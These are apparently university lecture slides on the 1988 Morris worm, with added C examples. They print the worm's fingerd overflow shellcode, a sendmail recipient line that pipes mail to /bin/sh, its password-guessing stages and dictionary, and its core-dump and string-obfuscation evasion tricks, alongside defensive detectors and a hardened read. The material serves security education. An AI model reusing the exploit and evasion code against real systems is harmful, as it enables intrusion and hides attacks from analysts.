The Internet Worm of 1988
Svetlana V. Drachova-Strang, Clemson University, CPSC 681, April 25, 2006
"There may be a virus loose on the internet" (Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988)
Creator and His Creation
• November 2nd, 1988: Robert Tappan Morris, a 23-year-old computer science student at Cornell, released a worm from a machine at MIT. Aside: he is the son of Robert Morris, Sr., Chief Scientist at the National Computer Security Center, a subdivision of the NSA.
• The Morris worm consisted of several files of cleverly written C code.
• Intentions: to probe the size of the Internet with a self-replicating program?
• Effects:
  -- Internet down
  -- Thousands of machines disconnected from the Internet
  -- Worm on the loose
What the worm DID NOT do:
• Did not cause physical damage to computer systems
• Did not alter or destroy system or user files
• Did not affect machines other than VAX and Sun-3 hosts running BSD-derived Unix (4.3BSD and SunOS)
• Did not save or transmit the cracked passwords
• Did not attempt to gain superuser access
• Did not plant any trojans or time bombs
• Did not attack machines that were not attached to the Internet
What the worm DID:
• Self-propagated through the Internet, infecting and reinfecting machines
• Self-replicated without limit
• Exploited several vulnerabilities: fingerd, sendmail, weak passwords, and the trusted-host lists it found on each victim
• Had flaws that made it especially destructive and/or impaired its intended functionality
• Cracked user passwords
• Disguised itself by several clever means
History and Origins
• "Worms were good at first": noble usage
• 1975: the "tapeworm" in John Brunner's The Shockwave Rider
• Early 1980s: John Shoch and Jon Hupp (Xerox PARC) created five worms for executing helpful tasks on the network: billboard worm, vampire worm, etc.: "a useful way to run distributed diagnostics"
• Mishap and the first lesson learned
• Their conclusions: "We have the tools at hand to experiment with distributed computations in their fullest form: dynamically allocating resources and moving from machine to machine. Furthermore, local networks supporting relatively large numbers of hosts now provide a rich environment for this kind of experimentation. The basic worm programs described here demonstrate the ease with which these mechanisms can be explored..." (J. Shoch, J. Hupp)
The Horrible Night
• 6:00 PM The worm is launched
• 8:49 PM The worm infects a VAX-8600 at the University of Utah
• 9:09 PM The worm initiates the first attack to infect others
• 9:21 PM Load average on the system reaches 5 (it should be about 1)
• 9:41 PM Load average reaches 7
• 10:01 PM Load average reaches 16
• 10:06 PM No new processes can be started; the system is unusable
• 10:20 PM System administrator kills off the worms
• 10:41 PM System is reinfected, load average reaches 27
• 10:49 PM System administrator shuts down and restarts the system
• 11:21 PM Reinfestation causes the load average to reach 37
fingerd Vulnerability Exploited
• fingerd read the request line with gets() into a 512-byte stack buffer, with no length check.
• The worm wrote 536 bytes plus a newline; the 24 extra bytes (six 32-bit VAX words) overwrote the saved stack frame, including the return PC.
• When the read returned, control landed in the injected VAX code, which made the execve("/bin/sh") system call with the connection as the shell's input and output, giving the worm a shell that installed the rest of the worm on the target.
• Caveat: the injected code was VAX machine code. The #ifdef sun branch only reorders the words; on Sun-3 hosts the same overflow crashed fingerd instead of spawning a shell.
• The worm's attack routine, as shown on the slide:
    char buf[536] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003\320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351";
    /* Rewrite part of the stack frame */
    l556 = 0x7fffe9fc; l560 = 0x7fffe8a8; l564 = 0x7fffe8bc;
    l568 = 0x28000000; l552 = 0x0001c020;
    #ifdef sun /* Reverse the word order for the Sun machines */
    l556 = byte_swap(l556); l560 = byte_swap(l560); l564 = byte_swap(l564);
    l568 = byte_swap(l568); l552 = byte_swap(l552);
    #endif sun
    write(s, buf, sizeof(buf)); /* sizeof == 536 */
    write(s, XS("\n"), 1);
    sleep(5);
    if (test_connection(s, s, 10)) {
        *fd1 = s; *fd2 = s;
        return 1;
    }
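The arithmetic of the overflow (512 bytes of buffer plus 24 bytes that land on six saved words), and the bounded read that would have stopped it, as an added example. This is not code from the slides or from the worm: a struct models the VAX stack frame, the control words are constructed values rather than the worm's, and the filler stands in for the shellcode.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the fingerd stack frame the worm overran: a 512-byte line buffer
 * followed by the six 32-bit words that the last 24 bytes of a 536-byte
 * request land on (saved registers, frame pointer, return PC). A struct
 * stands in for the real VAX call frame; the sizes are the slide's, the
 * exact layout is an assumption made for this example. */
#define LINE_MAX       512
#define OVERFLOW_WORDS 6
#define REQUEST_LEN    (LINE_MAX + 4 * OVERFLOW_WORDS)   /* 536 */

struct frame {
    char     buf[LINE_MAX];
    uint32_t saved[OVERFLOW_WORDS];
};

/* Constructed 536-byte request: filler where the worm put its VAX code, then
 * the six control words in host byte order. The real worm had to byte_swap
 * them for the Sun because the VAX and the 68000 store words differently. */
size_t build_request(unsigned char *out, const uint32_t words[OVERFLOW_WORDS])
{
    memset(out, 'A', LINE_MAX);
    for (int i = 0; i < OVERFLOW_WORDS; i++)
        memcpy(out + LINE_MAX + 4 * i, &words[i], sizeof words[i]);
    return REQUEST_LEN;
}

/* Vulnerable read, gets()-style: copies the whole request with no bound, so
 * the trailing 24 bytes overwrite the saved words. Returns the word that now
 * sits where the return PC was. The copy is clamped to the struct so that this
 * model stays within defined behaviour; real fingerd had no such clamp. */
uint32_t vulnerable_read(struct frame *f, const unsigned char *req, size_t len)
{
    memset(f->saved, 0, sizeof f->saved);
    if (len > sizeof *f) len = sizeof *f;
    memcpy((unsigned char *)f, req, len);
    return f->saved[OVERFLOW_WORDS - 1];
}

/* Hardened read: at most LINE_MAX-1 bytes, stop at the newline, always
 * NUL-terminate, and refuse anything longer instead of writing past the buffer. */
int hardened_read(struct frame *f, const unsigned char *req, size_t len)
{
    size_t i = 0;
    memset(f->saved, 0, sizeof f->saved);
    while (i < len && req[i] != '\n') {
        if (i == LINE_MAX - 1) {        /* no room left for the terminator */
            f->buf[0] = '\0';
            return -1;
        }
        f->buf[i] = (char)req[i];
        i++;
    }
    f->buf[i] = '\0';
    return (int)i;
}

/* Constructed control words; the last one plays the role of the return PC. */
static const uint32_t demo_words[OVERFLOW_WORDS] = {
    0x11111111, 0x22222222, 0x33333333, 0x44444444, 0x55555555, 0x7fffe9fc
};

/* The 536-byte request through the vulnerable read: returns the clobbered
 * return-PC word, i.e. the attacker's value 0x7fffe9fc. */
uint32_t demo_vulnerable(void)
{
    unsigned char req[REQUEST_LEN];
    struct frame f;
    size_t n = build_request(req, demo_words);
    return vulnerable_read(&f, req, n);
}

/* The same request through the hardened read: returns 1 if it was rejected
 * and all six saved words are still zero, 0 otherwise. */
int demo_hardened(void)
{
    unsigned char req[REQUEST_LEN];
    struct frame f;
    size_t n = build_request(req, demo_words);
    if (hardened_read(&f, req, n) != -1) return 0;
    for (int i = 0; i < OVERFLOW_WORDS; i++)
        if (f.saved[i] != 0) return 0;
    return 1;
}

int main(void)
{
    printf("vulnerable read: return-PC word = 0x%08x\n", (unsigned)demo_vulnerable());
    printf("hardened read: rejected with frame intact = %d\n", demo_hardened());
    return 0;
}
```

The point of the model is the count: 536 - 512 = 24 bytes = six longwords, exactly the l552..l568 slots the worm filled in. The hardened version is what fgets() with sizeof(buf) gives you, plus an explicit rejection of over-long lines rather than silently processing a truncated request.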
sendmail Vulnerability Exploited
• Not a TCP flaw: sendmail built with DEBUG accepted an SMTP "debug" command, after which a recipient could name a program to run instead of a user's mailbox.
• The worm opened an SMTP session, sent the debug command, and gave as the recipient a shell pipeline.
• sed '1,/^$/d' deletes the mail header (everything up to the first blank line); what remains of the message body is passed to /bin/sh, the command interpreter.
• The body was a shell script that compiled a small bootstrap program; that program opened a connection back to the infecting host and fetched a copy of the worm.
• The worm's SMTP exchange, as shown on the slide (the debug command itself was sent before this point):
    #define MAIL_FROM "mail from:</dev/null>\n"
    #define MAIL_RCPT "rcpt to:<\"| sed \'1,/^$/d\' | /bin/sh ; exit 0\">\n"
    send_text(s, XS(MAIL_FROM));
    sprintf(l548, XS(MAIL_RCPT), i, i);
    send_text(s, l548);
    send_text(s, XS("data\n"));
    compile_slave(host, s, saddr);
    send_text(s, XS("\n.\n"));
    send_text(s, XS("quit\n"));
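What this exchange looks like from the receiving side, and the two checks a mail server or log monitor would apply to it, as an added example (not code from the slides or from the worm). The transcript is constructed: the MAIL FROM and RCPT TO lines are the ones on the slide, the body lines are placeholders for the script that built the bootstrap program.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive test that line begins with verb. SMTP verbs are
 * case-insensitive and the worm sent them in lower case. */
static int has_verb(const char *line, const char *verb)
{
    while (*verb) {
        if (tolower((unsigned char)*line) != tolower((unsigned char)*verb))
            return 0;
        line++;
        verb++;
    }
    return 1;
}

/* 1 if the RCPT TO: argument names a program ("|...") instead of a mailbox.
 * Only a DEBUG-mode sendmail honoured such recipients; a server or a log
 * monitor should treat the form itself as hostile. Accepts the quoted form
 * the worm used, <"| ...">, as well as a bare <|...>. */
int rcpt_targets_program(const char *line)
{
    const char *p;
    if (!has_verb(line, "rcpt to:")) return 0;
    p = line + strlen("rcpt to:");
    while (*p == ' ' || *p == '<' || *p == '"') p++;
    return *p == '|';
}

#define SAW_DEBUG   1
#define SAW_PROGRAM 2

/* Scan the client side of an SMTP session; returns a bitmask of the two
 * signs of this attack: the debug command and a program as recipient. */
int session_flags(const char *const *lines, size_t n)
{
    int flags = 0;
    for (size_t i = 0; i < n; i++) {
        const char *l = lines[i];
        if (has_verb(l, "debug") && !isalnum((unsigned char)l[5]))
            flags |= SAW_DEBUG;
        if (rcpt_targets_program(l))
            flags |= SAW_PROGRAM;
    }
    return flags;
}

/* Constructed transcript of the worm's side of the session. sendmail prepends
 * its own header lines to the message, which is what the sed expression strips
 * before the rest reaches /bin/sh. */
const char *const worm_session[] = {
    "debug",
    "mail from:</dev/null>",
    "rcpt to:<\"| sed '1,/^$/d' | /bin/sh ; exit 0\">",
    "data",
    "cd /tmp",                                   /* placeholder body line */
    "cc -o bootstrap bootstrap.c && ./bootstrap", /* placeholder body line */
    ".",
    "quit",
};
#define WORM_SESSION_N (sizeof worm_session / sizeof worm_session[0])

/* Constructed ordinary session for comparison. */
const char *const normal_session[] = {
    "mail from:<alice@example.org>",
    "rcpt to: <bob@example.org>",
    "data",
    "hello",
    ".",
    "quit",
};
#define NORMAL_SESSION_N (sizeof normal_session / sizeof normal_session[0])

int main(void)
{
    printf("worm session flags:   %d\n", session_flags(worm_session, WORM_SESSION_N));
    printf("normal session flags: %d\n", session_flags(normal_session, NORMAL_SESSION_N));
    return 0;
}
```

Both signals are visible before any mail is delivered: a production server should reject the debug verb outright, and a recipient whose local part starts with "|" is a program-execution request, never a mailbox, regardless of quoting.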
Password Cracking
• Exploited two weaknesses:
  -- System: the hashed passwords in /etc/passwd were world-readable, so the worm could test guesses offline with its own DES routine
  -- User: weak passwords
• The attack has four stages:
  -- 0: seek other machines to infect from /etc/hosts.equiv and /.rhosts (and from users' .forward and .rhosts files)
  -- 1: obvious guesses derived from the account entry itself: no password, the account name, the name appended to itself, the names in the GECOS field, and reversed forms (35% success)
  -- 2: the worm's internal dictionary
  -- 3: the system's online dictionary in /usr/dict/words
Worm's dictionary
    char *wds[ ] = /* 0x21a74 */ {
        "academia", "aerobics", "airplane", "albany", "albatross", "albert", "alex", "alexander",
        "algebra", "aliases", "alphabet", "amorphous", "analog", "anchor", "andromache", "animals",
        "answer", "anthropogenic", "anvils", "anything", "aria", "ariadne", "arrow", "arthur",
        "athena", "atmosphere", "aztecs", "azure", "bacchus", "bailey", "banana", "bananas",
        "bandit", "banks", "barber", "baritone", "bass", "bassoon", "batman", "beater",
        "beauty", "beethoven", "beloved", "benz", "beowulf", "berkeley", "berliner", "beryl",
        "beverly", "bicameral", "brenda", "brian", "bridget", "broadway", "bumbling", "burgess",
        "campanile", "cantor", "cardinal",
        . . .
        "tarragon", "taylor", "telephone", "temptation", "thailand", "tiger", "toggle", "tomato",
        "topography", "tortoise", "toyota", "trails", "trivial", "trombone", "tubas", "tuttle",
        "umesh", "unhappy", "unicorn", "unknown", "urchin", "utility", "vasant", "vertigo",
        "vicky", "village", "virginia", "warren", "water", "weenie", "whatnot", "whiting",
        "whitney", "will", "william", "williamsburg", "willie", "winston", "wisconsin", "wizard",
        "wombat", "woodwind", "wormwood", "yacov", "yang", "yellowstone", "yosemite", "zimmerman",
        0 }; /* contained 421 words */
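The same three guessing stages turned into a check a system could run when a password is set, as an added example covering the stage list and the dictionary above (not code from the slides or from the worm, which compared DES hashes rather than plaintext). The stage-1 guess set approximates the published description of the worm; the account "jsmith", its GECOS string and the two sample word lists are constructed, the worm-dictionary sample being a handful of words from the list above.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAXPW    64
#define MAXGUESS 32

static void lower_copy(char *dst, const char *src)
{
    size_t i;
    for (i = 0; src[i] != '\0' && i < MAXPW - 1; i++)
        dst[i] = (char)tolower((unsigned char)src[i]);
    dst[i] = '\0';
}

static void reverse_copy(char *dst, const char *src)
{
    size_t n = strlen(src);
    if (n > MAXPW - 1) n = MAXPW - 1;
    for (size_t i = 0; i < n; i++)
        dst[i] = src[n - 1 - i];
    dst[n] = '\0';
}

static void add_guess(char out[][MAXPW], size_t *count, const char *g)
{
    if (*count >= MAXGUESS) return;
    for (size_t i = 0; i < *count; i++)
        if (strcmp(out[i], g) == 0) return;        /* already listed */
    snprintf(out[*count], MAXPW, "%s", g);
    (*count)++;
}

/* Stage 1: guesses derived from the passwd entry alone. Returns how many were
 * written to out: empty, account name, name doubled, name reversed, and each
 * GECOS name as typed, lowercased and reversed. */
size_t stage1_guesses(const char *user, const char *gecos, char out[][MAXPW])
{
    size_t n = 0;
    char tmp[MAXPW], tmp2[MAXPW], name[MAXPW], *comma, *w;

    add_guess(out, &n, "");
    add_guess(out, &n, user);
    snprintf(tmp, sizeof tmp, "%s%s", user, user);
    add_guess(out, &n, tmp);
    reverse_copy(tmp, user);
    add_guess(out, &n, tmp);

    snprintf(name, sizeof name, "%s", gecos);
    if ((comma = strchr(name, ',')) != NULL) *comma = '\0';   /* keep the full-name part */
    for (w = strtok(name, " "); w != NULL; w = strtok(NULL, " ")) {
        add_guess(out, &n, w);
        lower_copy(tmp, w);
        add_guess(out, &n, tmp);
        reverse_copy(tmp2, tmp);
        add_guess(out, &n, tmp2);
    }
    return n;
}

static int in_list(const char *pw, const char *const *list, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(pw, list[i]) == 0) return 1;
    return 0;
}

/* Which stage of the worm's attack would find this password:
 * 1 = derived from the account entry, 2 = in the worm's own dictionary,
 * 3 = in the system dictionary, 0 = survives all three. */
int guessable_stage(const char *user, const char *gecos, const char *pw,
                    const char *const *worm_dict, size_t nworm,
                    const char *const *sys_dict, size_t nsys)
{
    char guesses[MAXGUESS][MAXPW];
    size_t n = stage1_guesses(user, gecos, guesses);
    for (size_t i = 0; i < n; i++)
        if (strcmp(pw, guesses[i]) == 0) return 1;
    if (in_list(pw, worm_dict, nworm)) return 2;
    if (in_list(pw, sys_dict, nsys)) return 3;
    return 0;
}

/* Constructed sample lists: a few words from the worm's dictionary above and
 * a stand-in for /usr/dict/words. */
const char *const worm_dict_sample[] = { "academia", "batman", "beowulf", "wizard", "wombat", "yosemite" };
const char *const sys_dict_sample[]  = { "apple", "orange", "zebra" };
#define WORM_DICT_N (sizeof worm_dict_sample / sizeof worm_dict_sample[0])
#define SYS_DICT_N  (sizeof sys_dict_sample  / sizeof sys_dict_sample[0])

/* Constructed account "jsmith" with a typical GECOS field. */
#define SAMPLE_USER  "jsmith"
#define SAMPLE_GECOS "John Smith,Room 12,x555"

int check_sample(const char *pw)
{
    return guessable_stage(SAMPLE_USER, SAMPLE_GECOS, pw,
                           worm_dict_sample, WORM_DICT_N, sys_dict_sample, SYS_DICT_N);
}

size_t sample_stage1_count(void)
{
    char guesses[MAXGUESS][MAXPW];
    return stage1_guesses(SAMPLE_USER, SAMPLE_GECOS, guesses);
}

int main(void)
{
    const char *tries[] = { "", "htims", "jsmithjsmith", "wombat", "zebra", "Xk9#tQ2v" };
    for (size_t i = 0; i < sizeof tries / sizeof tries[0]; i++)
        printf("%-14s -> stage %d\n", tries[i], check_sample(tries[i]));
    return 0;
}
```

Stage 0 is omitted because it is about where to go next, not about passwords. A real dictionary of 421 words costs nothing to test against a hash when the hashes are readable by everyone, which is the system-side lesson: shadowed password files and slow hashes, not just better passwords.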
Concealing Itself
• Renamed itself to sh, which is also the name of the Bourne shell, so it did not stand out in a process listing:
    strcpy(argv[0], XS("sh"));
• Set the core dump size to zero, so a crash left no memory image for an analyst:
    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl)) ;
• Forked and let the parent exit, changing its process id and detaching from the process that started it
• Obfuscated its embedded strings (the XS() calls in the code above decode them at run time, so the file names and commands did not appear in the binary)
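Two of these four measures in working form, as an added example (not code from the slides or from the worm): the core-dump limit set and read back, and the per-byte XOR that the worm's XS() macro applied to its strings. The key is a parameter; 0x81 is the value published analyses report for the worm and is an assumption as far as this page goes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>

/* Disable core dumps for the calling process, as the worm did with
 * setrlimit(RLIMIT_CORE), then read the limit back. Returns the soft limit now
 * in effect (0 on success) or (rlim_t)-1 on error. An analyst who kills the
 * process with a core-dumping signal gets no memory image on disk. */
rlim_t disable_core_dumps(void)
{
    struct rlimit rl;
    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl) != 0) return (rlim_t)-1;
    if (getrlimit(RLIMIT_CORE, &rl) != 0) return (rlim_t)-1;
    return rl.rlim_cur;
}

/* XOR every byte with a one-byte key. Encoding and decoding are the same
 * operation; dst receives n bytes plus a NUL and is returned. */
char *xs_xor(char *dst, const unsigned char *src, size_t n, unsigned char key)
{
    for (size_t i = 0; i < n; i++)
        dst[i] = (char)(src[i] ^ key);
    dst[n] = '\0';
    return dst;
}

/* Round trip "/bin/sh" through the obfuscation: encode, confirm the stored
 * bytes no longer equal the plaintext (so strings(1) on the binary would not
 * show it), decode again. Returns the decoded string (static buffer), or NULL
 * if the key hides nothing (key 0). */
const char *xs_demo(unsigned char key)
{
    static const char plain[] = "/bin/sh";
    static unsigned char enc[sizeof plain];
    static char dec[sizeof plain];
    size_t n = strlen(plain);
    xs_xor((char *)enc, (const unsigned char *)plain, n, key);
    if (memcmp(enc, plain, n) == 0) return NULL;
    return xs_xor(dec, enc, n, key);
}

int main(void)
{
    printf("core limit after setrlimit: %ld\n", (long)disable_core_dumps());
    printf("decoded: %s\n", xs_demo(0x81));
    return 0;
}
```

The obfuscation is not encryption in any meaningful sense: the key is in the binary next to the data, and XOR with a constant is undone by the first analyst who notices that every "string" differs from printable ASCII by the same byte. It defeated a quick strings(1) pass, which was the point.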
Oops, ... The Worm Had Flaws
• Major flaws in the program code:
• Only about a 14% chance that a new copy would check whether the target system was already infected, so hosts were reinfected again and again, which is what drove the load averages in the Utah timeline
• A 1 in 7 chance (instead of the intended 1 in 10,000) that a listening worm would not honour the pleasequit signal and would keep running
• Tried to send 1 byte from each infected machine to the originating Berkeley machine, 128.32.137.13 port 11357, over UDP, but called sendto() on a TCP socket, so the packet never went out
• There were other flaws as well
Worm Map [from http://snowplow.org/tom/worm/history.html]
Lessons Learned
• The Morris worm was the first worm to bring the Internet down
• A worm is a powerful tool capable of inflicting a lot of damage
• Computer crime is punishable under the Computer Fraud and Abuse Act of 1986 (Morris was the first person convicted under it)
• Later, R. H. Morris stated that the incident "has raised the public awareness to a considerable degree" [R H Morris, quoted in the New York Times 11/5/88]
• System administrators increased their efforts to protect their systems